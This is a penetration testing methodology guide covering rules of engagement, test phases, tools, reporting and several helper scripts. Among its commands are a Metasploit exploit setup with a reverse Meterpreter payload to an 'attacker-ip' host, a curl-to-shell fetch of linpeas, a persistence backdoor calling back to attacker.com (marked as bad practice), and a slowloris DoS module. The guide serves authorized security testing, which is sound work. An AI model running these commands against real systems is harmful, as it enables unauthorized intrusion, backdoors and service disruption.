Penetration Testing Methodology: Phases, Tools, and Reporting Guide
What is the penetration testing methodology?
TL;DR
- Bottom line: A structured penetration test follows five core phases -- reconnaissance, scanning, exploitation, post-exploitation, and reporting -- each using specialized tools and requiring explicit written authorization before any testing begins.
- Key tool/command: `nmap -sC -sV -O -T4 target` for initial reconnaissance; `msfconsole` for exploitation; Burp Suite for web app testing.
- Watch out for: Testing without written authorization (Rules of Engagement) is illegal regardless of intent -- always get sign-off before scanning a single port.
- Works with: PTES, OWASP WSTG v4.2, NIST SP 800-115, OSSTMM 3, MITRE ATT&CK. Tools: Nmap 7.x, Metasploit 6.x, Burp Suite 2024.x+, Kali Linux 2024+.
Constraints
- NEVER perform penetration testing without explicit written authorization (Rules of Engagement) from the system owner
- All testing MUST stay within the defined scope -- attacking out-of-scope systems is unauthorized access
- Credential harvesting, data exfiltration, and persistent backdoors require explicit pre-approval in the ROE
- Production systems require extra caution -- destructive exploits (DoS, data corruption) need client sign-off
- All findings MUST be reported, including accidental access to sensitive data (PII, credentials)
- Comply with applicable laws: CFAA (US), Computer Misuse Act (UK), StGB 202a-c (DE) -- authorization does not override legal restrictions
Quick Reference
Penetration Testing Phases and Tools
| # | Phase | Objective | Key Tools | MITRE ATT&CK Tactic | Deliverable |
|---|---|---|---|---|---|
| 1 | Pre-engagement | Define scope, ROE, timeline, emergency contacts | Contract templates, PTES pre-engagement checklist | -- | Signed ROE document |
| 2 | Reconnaissance (OSINT) | Gather publicly available intel on target | Nmap, Shodan, theHarvester, Recon-ng, Google Dorks, WHOIS | Reconnaissance (TA0043) | Target profile document |
| 3 | Scanning & Enumeration | Identify live hosts, open ports, services, vulnerabilities | Nmap, Nessus, Nikto, Gobuster, enum4linux, SSLScan | Discovery (TA0007) | Port/service/vulnerability list |
| 4 | Vulnerability Analysis | Analyze scan results, prioritize exploitable vulns | Burp Suite, OWASP ZAP, Nuclei, searchsploit | -- | Prioritized vulnerability matrix |
| 5 | Exploitation | Validate vulnerabilities by gaining access | Metasploit, Burp Suite Pro, SQLMap, Hydra, John the Ripper | Initial Access (TA0001), Execution (TA0002) | Proof of exploitation |
| 6 | Post-Exploitation | Assess impact: pivot, escalate privileges, exfil data | Meterpreter, BloodHound, Mimikatz, LinPEAS, WinPEAS | Privilege Escalation (TA0004), Lateral Movement (TA0008) | Impact assessment |
| 7 | Reporting | Document findings, risk ratings, remediation | Custom templates, Dradis, PlexTrac, Serpico | -- | Executive + technical report |
| 8 | Remediation Verification | Retest after fixes are applied | Same tools as exploitation phase | -- | Retest report |
Testing Types
| Test Type | Knowledge Level | Simulates | Best For |
|---|---|---|---|
| Black Box | No prior knowledge of target | External attacker | Realistic threat simulation |
| Grey Box | Partial knowledge (credentials, architecture docs) | Insider threat or compromised account | Efficient coverage of attack surface |
| White Box | Full access (source code, network diagrams, admin creds) | Comprehensive audit | Maximum vulnerability discovery |
Major Frameworks Comparison
| Framework | Focus | Phases | Strengths | Limitation |
|---|---|---|---|---|
| PTES | General pentest | 7 (pre-engagement to reporting) | Most comprehensive, widely adopted | Not updated frequently |
| OWASP WSTG | Web application | 12 testing categories | Deep web-specific guidance | Web-only scope |
| NIST SP 800-115 | Government/compliance | 4 (planning, discovery, attack, reporting) | Compliance-aligned, risk-based | Less tactical detail |
| OSSTMM 3 | Operational security | 6 channels | Metrics-driven (rav score) | Complex, less community support |
| MITRE ATT&CK | Adversary emulation | 14 tactics, 200+ techniques | Maps to real-world TTPs | Framework, not step-by-step methodology |
Decision Tree
```text
START: What type of penetration test do you need?
├── Web application?
│ ├── YES → Follow OWASP WSTG v4.2 testing categories
│ │ Tools: Burp Suite, OWASP ZAP, Nikto, SQLMap, Gobuster
│ └── NO ↓
├── Network/infrastructure?
│ ├── YES → Follow PTES methodology + NIST SP 800-115
│ │ Tools: Nmap, Nessus, Metasploit, Responder, CrackMapExec
│ └── NO ↓
├── API testing?
│ ├── YES → OWASP API Security Top 10 + WSTG API sections
│ │ Tools: Burp Suite, Postman, Nuclei, ffuf
│ └── NO ↓
├── Cloud environment?
│ ├── YES → PTES + cloud-specific tools
│ │ Tools: ScoutSuite, Prowler (AWS), az-cli (Azure), CloudSploit
│ └── NO ↓
├── Wireless?
│ ├── YES → OSSTMM wireless channel + PTES
│ │ Tools: Aircrack-ng, Kismet, Wireshark, Wifite
│ └── NO ↓
└── DEFAULT → PTES general methodology + MITRE ATT&CK mapping
```
Step-by-Step Guide
1. Define scope and rules of engagement
Establish the legal and operational boundaries of the test. Document target systems, IP ranges, testing windows, emergency contacts, and explicitly forbidden actions. [src2]
```text
# Rules of Engagement (ROE) checklist:
- [ ] Target IP ranges / domains / URLs (in-scope)
- [ ] Explicitly out-of-scope systems
- [ ] Testing window (dates, hours, timezone)
- [ ] Test type: black box / grey box / white box
- [ ] Allowed actions: scanning, exploitation, social engineering, DoS
- [ ] Data handling: what to do with discovered PII/credentials
- [ ] Emergency contacts (client POC, escalation path)
- [ ] Communication channels and frequency
- [ ] Signed authorization letter (legal protection)
```
Verify: Both parties have signed the ROE document. Keep a copy accessible during the entire engagement.
2. Perform passive reconnaissance (OSINT)
Gather publicly available information without directly interacting with the target. [src1]
```bash
# DNS enumeration
dig +short target.com ANY
# WHOIS lookup
whois target.com
# Subdomain enumeration
theHarvester -d target.com -b google,bing,linkedin -l 500
# Search for exposed services on Shodan
shodan search hostname:target.com
```
Verify: Target profile contains: IP ranges, subdomains, employee names/emails, technology stack, and exposed services.
3. Perform active scanning and enumeration
Directly probe the target to identify live hosts, open ports, running services, and their versions. [src6]
```bash
# Full port scan with service detection and OS fingerprinting
nmap -sC -sV -O -p- -T4 --open -oA full-scan target.com
# Top 1000 ports quick scan
nmap -sC -sV -T4 --top-ports 1000 -oN quick-scan.txt target.com
# Web directory brute-force
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -o dirs.txt
# Vulnerability scan with Nmap NSE scripts
nmap --script vuln -p 80,443,8080 target.com
```
Verify: `cat full-scan.nmap` (the `-oA full-scan` prefix writes `full-scan.nmap`, `full-scan.gnmap`, and `full-scan.xml`) shows open ports, service versions, and OS detection results.
4. Analyze vulnerabilities and prioritize targets
Review scan results, research identified services for known CVEs, and build an exploitation plan. [src1]
```bash
# Search for known exploits
searchsploit apache 2.4
searchsploit openssh 8.
# Burp Suite: import target URL, run active scan on discovered endpoints
```
Verify: Vulnerability matrix created with: Vulnerability, CVE, CVSS Score, Affected Host/Port, Exploitation Feasibility.
5. Exploit validated vulnerabilities
Attempt to exploit confirmed vulnerabilities to prove impact. Document every step with timestamps and screenshots. [src5]
```text
# Metasploit: search and use an exploit
msfconsole -q
msf6> search type:exploit name:apache
msf6> use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6> set RHOSTS target.com
msf6> set LHOST attacker-ip
msf6> set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6> exploit
```
Verify: Successful exploitation produces a shell, extracted data, or modified state. Capture evidence.
6. Perform post-exploitation assessment
After gaining initial access, assess real-world impact: escalate privileges, move laterally, determine reachable data. [src2]
```text
# Meterpreter post-exploitation
meterpreter> sysinfo
meterpreter> getuid
meterpreter> getsystem
meterpreter> run post/multi/recon/local_exploit_suggester
# Linux privilege escalation
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
```
Verify: Document the maximum access achieved and what data was accessible. Record the full attack chain.
7. Write the penetration test report
Structure the report for two audiences: executives (risk/business impact) and technical teams (reproduction steps, remediation). [src3]
```text
# Report structure:
1. EXECUTIVE SUMMARY (1-2 pages)
2. METHODOLOGY (framework, tools, limitations)
3. FINDINGS (per vulnerability: title, CVSS, PoC, impact, remediation)
4. REMEDIATION PRIORITY MATRIX
5. APPENDICES (scan output, tools, tester details)
```
Verify: Report includes executive summary, all findings with CVSS scores and PoC evidence, and prioritized remediation.
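Steps 4 and 7 above revolve around the same data: a validated finding with a CVSS score, an affected host and port, and a remediation. The following Python is an added example, not code from the original guide, that builds the prioritized vulnerability matrix from step 4 and renders the per-finding table for the step 7 findings section, dropping anything that has no proof-of-concept behind it. The sample findings, hostnames and CVE identifiers are constructed placeholders, and the priority weights for public exploits and internet exposure are assumptions chosen for illustration; the severity bands are the CVSS v3.1 qualitative scale.

```python
# Added example (not from the guide): build the prioritized vulnerability
# matrix of step 4 and render the findings table for the step 7 report.
# Findings, hosts and CVE ids below are constructed placeholders, and the
# priority weights are an assumption for illustration.
from __future__ import annotations

from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    title: str
    host: str
    port: int
    cvss: float            # CVSS v3.1 base score, 0.0 to 10.0
    validated: bool        # a proof-of-concept was captured by the tester
    exploit_public: bool   # a working public exploit exists (e.g. a searchsploit hit)
    internet_facing: bool  # reachable from outside the perimeter
    remediation: str
    cve: str = "N/A"


def cvss_severity(score: float) -> str:
    """CVSS v3.1 qualitative rating scale."""
    if score <= 0.0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


def priority_score(f: Finding) -> float:
    """Base score plus context modifiers (the weights are an assumption for this example)."""
    score = f.cvss
    if f.exploit_public:
        score += 1.5
    if f.internet_facing:
        score += 1.0
    return round(min(score, 10.0), 1)


def prioritized_matrix(findings: list[Finding]) -> list[Finding]:
    """Drop unvalidated scanner output, then order by priority, CVSS and host."""
    return sorted((f for f in findings if f.validated),
                  key=lambda f: (-priority_score(f), -f.cvss, f.host))


def severity_counts(findings: list[Finding]) -> dict[str, int]:
    """Counts per severity band, the headline numbers for the executive summary."""
    return dict(Counter(cvss_severity(f.cvss) for f in prioritized_matrix(findings)))


def render_findings_table(findings: list[Finding]) -> str:
    """Markdown table in the column order the findings section of the report uses."""
    rows = ["| # | Finding | Host:Port | CVE | CVSS | Severity | Priority | Remediation |",
            "|---|---|---|---|---|---|---|---|"]
    for i, f in enumerate(prioritized_matrix(findings), start=1):
        rows.append(f"| {i} | {f.title} | {f.host}:{f.port} | {f.cve} | {f.cvss:.1f} | "
                    f"{cvss_severity(f.cvss)} | {priority_score(f):.1f} | {f.remediation} |")
    return "\n".join(rows)


# Constructed sample findings (placeholder hosts and CVE ids, not real advisories)
SAMPLE_FINDINGS = [
    Finding("SQL injection in login form", "app.example", 443, 9.8, True, True, True,
            "Use parameterised queries; add input validation", "CVE-0000-0001"),
    Finding("Outdated OpenSSH with known RCE", "bastion.example", 22, 7.5, True, False, True,
            "Upgrade OpenSSH; restrict admin access by source IP", "CVE-0000-0002"),
    Finding("SMB signing not required", "fileserver.internal", 445, 5.3, True, True, False,
            "Enforce SMB signing via group policy"),
    Finding("Reflected XSS reported by scanner", "app.example", 443, 6.1, False, False, True,
            "Pending validation; not reportable without a PoC"),
]

if __name__ == "__main__":
    print(render_findings_table(SAMPLE_FINDINGS))
    print(severity_counts(SAMPLE_FINDINGS))
```

The unvalidated XSS never reaches the table, which is the "no proof, no finding" rule from the pitfalls list enforced in code; the SQL injection outranks the OpenSSH issue even before the modifiers, and the internal SMB finding lands last despite its public exploit because it is not reachable from outside.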
Code Examples
Bash: Automated Reconnaissance Script
```bash
#!/bin/bash
# Input: target domain and output directory
# Output: reconnaissance files (subdomains, ports, services)
set -euo pipefail
TARGET="${1:?usage: $0 <target-domain> [output-dir]}"
OUTDIR="${2:-./recon-$TARGET}"
mkdir -p "$OUTDIR"
echo "[*] Starting recon for $TARGET"
# Subdomain enumeration
subfinder -d "$TARGET" -silent -o "$OUTDIR/subdomains.txt"
# Resolve live hosts (httpx prints URLs such as https://host:port)
httpx -l "$OUTDIR/subdomains.txt" -silent -o "$OUTDIR/live-hosts.txt"
# Nmap needs bare hostnames, so strip scheme, port and path from the httpx output
sed -E 's#^https?://##; s#[:/].*$##' "$OUTDIR/live-hosts.txt" | sort -u > "$OUTDIR/live-hosts-clean.txt"
# Port scan live hosts
nmap -sC -sV -T4 --open -iL "$OUTDIR/live-hosts-clean.txt" \
    -oA "$OUTDIR/nmap-scan" 2>/dev/null
```
Python: Nmap Scan Parser
```python
# Input: Nmap XML output file (from -oX, or the .xml file written by -oA)
# Output: structured list of hosts with ports and services
import xml.etree.ElementTree as ET


def parse_nmap_xml(xml_file: str) -> list[dict]:
    tree = ET.parse(xml_file)
    hosts = []
    for host in tree.getroot().findall("host"):
        # Prefer the IPv4 address element; Nmap may also emit a MAC address entry
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address")
        addr = addr_el.get("addr", "") if addr_el is not None else ""
        ports = []
        for port in host.findall(".//port"):
            state = port.find("state")
            svc = port.find("service")
            # Compare elements with None: an Element with no children is falsy, so
            # "if svc" would silently drop every <service .../> without sub-elements
            ports.append({
                "port": int(port.get("portid", 0)),
                "state": state.get("state", "") if state is not None else "",
                "service": svc.get("name", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
        hosts.append({"ip": addr, "ports": ports})
    return hosts
```
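Phase 8 in the phases table (remediation verification) is where a parser like this earns its keep: the retest scan has to be compared against the baseline, port by port. The following is an added example, not part of the original guide, that applies the same ElementTree approach to two constructed Nmap XML samples and reports, per host, which ports were closed, which remain open and which are newly exposed, then decides whether the retest passes. The host address, ports and service strings are constructed sample data, not output from a real scan.

```python
# Added example (not from the guide): verify remediation by diffing a baseline
# Nmap XML scan against the retest scan. Both documents are constructed samples
# in Nmap's -oX layout; the address and services are placeholders.
from __future__ import annotations

import xml.etree.ElementTree as ET

BASELINE_XML = """<nmaprun>
  <host><address addr="192.168.1.100" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" version="7.4"/></port>
    <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
  </ports></host>
</nmaprun>"""

RETEST_XML = """<nmaprun>
  <host><address addr="192.168.1.100" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" version="9.6"/></port>
    <port protocol="tcp" portid="445"><state state="closed"/></port>
    <port protocol="tcp" portid="3389"><state state="filtered"/></port>
    <port protocol="tcp" portid="8080"><state state="open"/><service name="http-proxy"/></port>
  </ports></host>
</nmaprun>"""


def open_ports(xml_text: str) -> dict[str, dict[int, str]]:
    """Map each host's IPv4 address to {port: 'service version'} for open ports only."""
    result: dict[str, dict[int, str]] = {}
    for host in ET.fromstring(xml_text).findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        ports: dict[int, str] = {}
        for port in host.findall(".//port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            # Element truthiness is based on child count, so test against None
            label = "" if svc is None else " ".join(
                v for v in (svc.get("name"), svc.get("version")) if v)
            ports[int(port.get("portid", 0))] = label
        result[addr_el.get("addr", "")] = ports
    return result


def retest_diff(baseline_xml: str, retest_xml: str) -> dict[str, dict[str, set[int]]]:
    """Per host: ports closed since the baseline, still open, and newly exposed."""
    before, after = open_ports(baseline_xml), open_ports(retest_xml)
    diff = {}
    for ip in sorted(set(before) | set(after)):
        b, a = set(before.get(ip, {})), set(after.get(ip, {}))
        diff[ip] = {"closed": b - a, "still_open": b & a, "new": a - b}
    return diff


def remediation_verified(diff: dict, expected_closed: dict[str, set[int]]) -> bool:
    """True only if every port the client committed to closing is now closed
    and no new service appeared on that host between the two scans."""
    for ip, ports in expected_closed.items():
        entry = diff.get(ip)
        if entry is None or not ports <= entry["closed"] or entry["new"]:
            return False
    return True


if __name__ == "__main__":
    d = retest_diff(BASELINE_XML, RETEST_XML)
    for ip, e in d.items():
        print(ip, "closed:", sorted(e["closed"]), "still open:", sorted(e["still_open"]),
              "new:", sorted(e["new"]))
    print("remediation verified:", remediation_verified(d, {"192.168.1.100": {445, 3389}}))
```

In the constructed data the two ports the client promised to close are indeed gone, yet the retest fails: a new service on 8080 appeared between scans, and a retest report that only checks the original findings would miss it. Treating "new" as a failure condition is a deliberate choice; a filtered port is counted as closed here because the scanner can no longer reach it, which is the evidence a retest report needs.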
Python: Metasploit RPC Automation
```python
# Input: target IP and exploit module path
# Output: job id / uuid of the launched exploit (check session.list for shells)
import msgpack   # msfrpcd speaks MessagePack, not JSON
import requests  # ^2.31.0


class MetasploitRPC:
    # Assumes msfrpcd was started without SSL (msfrpcd -S -P <password>); with SSL
    # enabled, use https:// and point verify= at the msfrpcd certificate
    def __init__(self, host="127.0.0.1", port=55553, username="msf", password="msf"):
        self.url = f"http://{host}:{port}/api/"
        self.headers = {"Content-Type": "binary/message-pack"}
        # auth.login takes username and password and returns a session token
        self.token = self._call("auth.login", username, password)["token"]

    def _call(self, method: str, *args):
        resp = requests.post(self.url, data=msgpack.packb([method, *args]),
                             headers=self.headers, timeout=30)
        resp.raise_for_status()
        result = msgpack.unpackb(resp.content, raw=False)
        if isinstance(result, dict) and result.get("error"):
            raise RuntimeError(result.get("error_message", "RPC call failed"))
        return result

    def run_exploit(self, module: str, options: dict) -> dict:
        # Returns {"job_id": ..., "uuid": ...}; the exploit runs as a background job
        return self._call("module.execute", self.token, "exploit", module, options)

# Usage: msf = MetasploitRPC(password="your-rpc-password")
```
Anti-Patterns
Wrong: Scanning without authorization
```bash
# BAD -- scanning without written authorization is illegal
nmap -sV -p- production-server.company.com
# Even "just scanning" without permission violates CFAA, CMA, etc.
```
Correct: Verified scope before any scanning
```bash
# GOOD -- verify target is in scope before scanning
TARGET="192.168.1.0/24"
echo "[*] Confirming target is in ROE scope..."
# -x matches the whole line and -F disables regex, so "192.168.1.0/24" cannot
# match a longer or partial entry; if/else keeps an nmap failure from being
# reported as a scope error
if grep -qxF "$TARGET" roe-scope.txt; then
    nmap -sC -sV -T4 "$TARGET" -oA in-scope-scan
else
    echo "ERROR: Target not in scope. Aborting." >&2
    exit 1
fi
```
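Both the ROE checklist in step 1 and the scope check above come down to one question: is this target inside the signed scope, right now? The following Python is an added example (not from the original guide) that answers it for IP addresses, CIDR ranges and hostname patterns, lets explicit exclusions override inclusions, and refuses anything outside the testing window. The JSON layout of the ROE file and every address, name and date in it are constructed assumptions for illustration; a real engagement would load the values from the signed document.

```python
# Added example (not from the guide): a scope gate that checks each candidate
# target against the signed ROE before any scanner runs. The JSON layout
# (in_scope / out_of_scope / window) and all values are constructed assumptions.
from __future__ import annotations

import ipaddress
import json
from dataclasses import dataclass
from datetime import datetime, timezone

SAMPLE_ROE = json.dumps({
    "in_scope": ["192.168.1.0/24", "10.0.5.10", "target.example", "*.app.example"],
    "out_of_scope": ["192.168.1.1", "db.app.example"],
    "window": {"start": "2024-06-03T22:00:00+00:00", "end": "2024-06-04T06:00:00+00:00"},
})


def _split(entries: list[str]) -> tuple[list, list[str]]:
    """Separate IP/CIDR entries from hostname patterns."""
    nets, names = [], []
    for entry in entries:
        try:
            nets.append(ipaddress.ip_network(entry, strict=False))
        except ValueError:
            names.append(entry.lower().rstrip("."))
    return nets, names


def _name_matches(host: str, patterns: list[str]) -> bool:
    # "*.app.example" matches any subdomain of app.example, not the apex itself
    return any(host.endswith(p[1:]) if p.startswith("*.") else host == p for p in patterns)


@dataclass
class Roe:
    nets: list
    names: list[str]
    excluded_nets: list
    excluded_names: list[str]
    start: datetime
    end: datetime

    @classmethod
    def load(cls, text: str) -> Roe:
        doc = json.loads(text)
        nets, names = _split(doc["in_scope"])
        xnets, xnames = _split(doc["out_of_scope"])
        return cls(nets, names, xnets, xnames,
                   datetime.fromisoformat(doc["window"]["start"]),
                   datetime.fromisoformat(doc["window"]["end"]))

    def check(self, target: str, now: datetime) -> tuple[bool, str]:
        """Exclusions override inclusions; nothing is allowed outside the window."""
        if not (self.start <= now <= self.end):
            return False, "outside testing window"
        try:
            ip = ipaddress.ip_address(target)
        except ValueError:
            host = target.lower().rstrip(".")
            if _name_matches(host, self.excluded_names):
                return False, "explicitly out of scope"
            if _name_matches(host, self.names):
                return True, "in scope"
            return False, "not listed in ROE"
        # ip_network membership is version-aware, so a v4 address is never "in" a v6 range
        if any(ip in net for net in self.excluded_nets):
            return False, "explicitly out of scope"
        if any(ip in net for net in self.nets):
            return True, "in scope"
        return False, "not listed in ROE"

    def approved(self, targets: list[str], now: datetime) -> list[str]:
        """The subset of targets that may be handed to the scanner."""
        return [t for t in targets if self.check(t, now)[0]]


if __name__ == "__main__":
    roe = Roe.load(SAMPLE_ROE)
    now = datetime(2024, 6, 4, 1, 0, tzinfo=timezone.utc)
    for t in ["192.168.1.50", "192.168.1.1", "10.0.5.11", "www.app.example", "db.app.example"]:
        print(f"{t:20} {roe.check(t, now)}")
```

Only what `approved()` returns should ever reach `nmap -iL` or a similar input list; the reason string from `check()` belongs in the engagement log, so that a refused host can be explained to the client later. Note that the window comparison requires timezone-aware datetimes, which is deliberate: a testing window written without a timezone is exactly the ambiguity the ROE checklist warns about.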
Wrong: Using destructive exploits without approval
```text
# BAD -- DoS exploits without explicit approval
msf6> use auxiliary/dos/http/slowloris
msf6> set RHOSTS production.target.com
msf6> run
# This can crash production systems and cause business disruption
```
Correct: Non-destructive validation with documentation
```text
# GOOD -- validate vulnerability without causing damage
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.100
msf6> check
# [*] 192.168.1.100:445 - The target is vulnerable.
# Document "check" output as proof -- only exploit with approval
```
Wrong: Skipping post-exploitation cleanup
```text
# BAD -- leaving backdoors or artifacts on target
meterpreter> run persistence -X -i 10 -p 4444 -r attacker.com
# Persistent backdoors left on client systems create real security risk
```
Correct: Clean up all artifacts after testing
```text
# GOOD -- remove all testing artifacts and document cleanup
# Cleanup checklist:
# - Remove uploaded tools (linpeas.sh, winpeas.exe, nc.exe)
# - Delete created user accounts
# - Remove cron jobs / scheduled tasks
# - Close reverse shells and tunnels
# - Document all artifacts and their removal status
```
Common Pitfalls
- Incomplete scope definition: Vague scope leads to testing unauthorized systems. Fix: Enumerate every in-scope IP, domain, and URL in the ROE before starting. [src2]
- Relying solely on automated scanners: Automated tools miss business logic flaws and chained vulnerabilities. Fix: Supplement automated scanning with manual testing and creative exploitation. [src1]
- Not testing UDP ports: Many testers skip UDP scanning because it is slow. Fix: Scan at least the top 100 UDP ports (`nmap -sU --top-ports 100`). [src6]
- Reporting vulnerabilities without proof: Listing CVEs from a scanner without validation produces false positives. Fix: Validate every finding with a proof-of-concept. [src3]
- Ignoring the human element: Many breaches start with social engineering. Fix: Include phishing simulation and physical access testing in scope (with ROE approval). [src4]
- Forgetting authenticated testing: Unauthenticated scanning misses privilege escalation and IDOR vulnerabilities. Fix: Request test credentials for grey/white box tests. [src1]
- Not mapping to business impact: Technical CVSS scores alone do not communicate risk. Fix: Translate every finding to business impact (data breach cost, regulatory fine). [src3]
- Running scans during business hours: Aggressive scanning can trigger IDS alerts or crash services. Fix: Coordinate scanning windows and start with low-intensity scans (-T2). [src2]
Diagnostic Commands
```bash
# Verify Nmap is installed and check version
nmap --version
# Verify Metasploit is installed and check version
msfconsole --version
# Check if target host is reachable
ping -c 3 target.com
# Verify you can reach target ports
nmap -Pn -p 80,443 target.com
# Check your external IP (for reverse shell LHOST)
curl -s ifconfig.me
# Verify Burp Suite proxy is running
curl -x http://127.0.0.1:8080 -k https://target.com
# Test Metasploit database connectivity
msfconsole -q -x "db_status; exit"
# Check if required tools are installed (Metasploit's binary is msfconsole, not metasploit-framework)
which nmap msfconsole nikto gobuster sqlmap hydra 2>/dev/null
```
Version History & Compatibility
| Framework/Tool | Version | Status | Key Updates |
|---|---|---|---|
| PTES | v1.1 | Current | Refreshed technical guidelines (2024) |
| OWASP WSTG | v4.2 | Current | Updated testing categories for modern web apps |
| NIST SP 800-115 | Rev 1 | Current | Updated May 2021 -- federal standard |
| OSSTMM | 3.02 | Current | Last major update Dec 2010 |
| MITRE ATT&CK | v16 | Current | Quarterly updates with new techniques |
| Nmap | 7.95 | Current | New NSE scripts, improved OS detection |
| Metasploit | 6.4 | Current | EDR bypass modules, improved Linux privesc |
| Burp Suite | 2024.x | Current | AI-driven scanning hints, smart fuzzing |
| Kali Linux | 2024.4 | Current | Updated tool repositories |
When to Use / When Not to Use
| Use When | Don't Use When | Use Instead |
|---|---|---|
| Validating security controls with simulated attacks | Only need to check for known CVEs in dependencies | Automated vulnerability scanning (Nessus, Trivy) |
| Compliance requires pentest (PCI DSS, SOC 2, ISO 27001) | Building security into new code during development | Secure SDLC (SAST/DAST in CI/CD pipeline) |
| Assessing real-world exploitability of vulnerabilities | Need continuous security monitoring | SIEM + EDR solution |
| Testing incident response readiness (red team exercise) | Target system is in active development with no stable release | Code review instead |
| Evaluating security after major infrastructure changes | Need to train developers on secure coding | Security training programs + code review |
Important Caveats
- Penetration testing is a point-in-time assessment -- it does not guarantee ongoing security. New vulnerabilities are discovered daily
- Black box testing may miss vulnerabilities that grey/white box testing would find -- the test type should match the threat model
- Automated exploitation tools (Metasploit, SQLMap) can cause unintended damage on fragile systems -- always use the `check` command before `exploit`
- Social engineering tests (phishing, vishing) require separate authorization and may have HR/legal implications
- Cloud environments (AWS, Azure, GCP) have their own penetration testing policies -- review and comply with provider rules before testing
- Results depend heavily on tester skill level -- the same scope tested by a junior vs. senior pentester may yield very different findings
- Zero-day vulnerabilities are generally not in scope for standard pentests -- they require specialized research or red team engagements